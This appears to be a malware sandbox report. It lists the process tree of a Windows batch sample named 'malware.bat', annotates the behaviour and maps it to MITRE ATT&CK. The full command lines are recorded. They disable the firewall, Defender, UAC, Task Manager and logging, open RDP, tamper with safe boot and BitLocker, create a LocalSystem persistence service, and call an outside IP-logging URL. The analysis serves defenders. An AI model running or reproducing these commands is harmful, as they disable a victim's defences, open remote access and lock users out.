    [C:\Windows\system32\find.exe] find "BackupProductKeyDefault"
  [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
  [C:\Windows\system32\taskkill.exe] taskkill /F /IM msedge.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\taskkill.exe] taskkill /F /IM chrome.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\taskkill.exe] taskkill /F /IM firefox.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\timeout.exe] timeout /t 300 /nobreak
    - Delays execution with timeout.exe
[C:\Windows\System32\CompPkgSrv.exe] C:\Windows\System32\CompPkgSrv.exe -Embedding
[C:\Windows\System32\CompPkgSrv.exe] C:\Windows\System32\CompPkgSrv.exe -Embedding
[C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
  - Modifies data under HKEY_USERS
  [C:\Windows\system32\net.exe] net session
    [C:\Windows\system32\net1.exe] C:\Windows\system32\net1 session
  [C:\Windows\system32\powercfg.exe] powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\powercfg.exe] powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\powercfg.exe] powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\powercfg.exe] powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\netsh.exe] netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
    - Modifies Windows Firewall
  [C:\Windows\system32\netsh.exe] netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
    - Modifies Windows Firewall
  [C:\Windows\system32\netsh.exe] netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
    - Modifies Windows Firewall
  [C:\Windows\system32\netsh.exe] netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
    - Modifies Windows Firewall
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\netsh.exe] netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall
  [C:\Windows\system32\reg.exe] reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  [C:\Windows\system32\reg.exe] reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
  [C:\Windows\system32\reg.exe] REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
  [C:\Windows\system32\reg.exe] reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\Desktop\MuiCached" /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\Desktop\MuiCache" /f
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
  [C:\Windows\system32\reg.exe] reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    - UAC bypass
  [C:\Windows\system32\reg.exe] reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
  [C:\Windows\system32\reg.exe] reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  [C:\Windows\system32\reg.exe] reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\reg.exe] reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
  [C:\Windows\system32\reg.exe] reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
  [C:\Windows\system32\reg.exe] reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
  [C:\Windows\system32\reg.exe] reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
  [C:\Windows\system32\reg.exe] reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
  [C:\Windows\system32\reg.exe] reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
  [C:\Windows\system32\reg.exe] reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
  [C:\Windows\system32\reg.exe] reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS
  [C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
    [C:\Windows\system32\ipconfig.exe] ipconfig
      - Gathers network information
    [C:\Windows\system32\findstr.exe] findstr IPv4
  [C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c whoami
    [C:\Windows\system32\whoami.exe] whoami
      - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c net user "GSAGMHCQ$"
    [C:\Windows\system32\net.exe] net user "GSAGMHCQ$"
  [C:\Windows\system32\takeown.exe] takeown /f "C:\Windows\System32\notepad.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\icacls.exe] icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
    - Possible privilege escalation attempt
    - Modifies file permissions
  [C:\Windows\system32\manage-bde.exe] manage-bde -off C:
  [C:\Windows\system32\manage-bde.exe] manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
  [C:\Windows\system32\bcdedit.exe] bcdedit /set {default} recoveryenabled yes
    - Modifies boot configuration data using bcdedit
  [C:\Windows\system32\bcdedit.exe] bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit
  [C:\Windows\system32\sc.exe] sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
    - Launches sc.exe
  [C:\Windows\system32\net.exe] net start MiServicio
    [C:\Windows\system32\net1.exe] C:\Windows\system32\net1 start MiServicio
  [C:\Windows\system32\takeown.exe] takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\icacls.exe] icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions
[C:\Windows\system32\OpenWith.exe] C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
[C:\Windows\system32\OpenWith.exe] C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
[C:\Windows\system32\OpenWith.exe] C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- System Services (1)
  - Service Execution (1)
- Command and Scripting Interpreter (2)
  - PowerShell (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (2)
  - Windows Service (2)
Downloads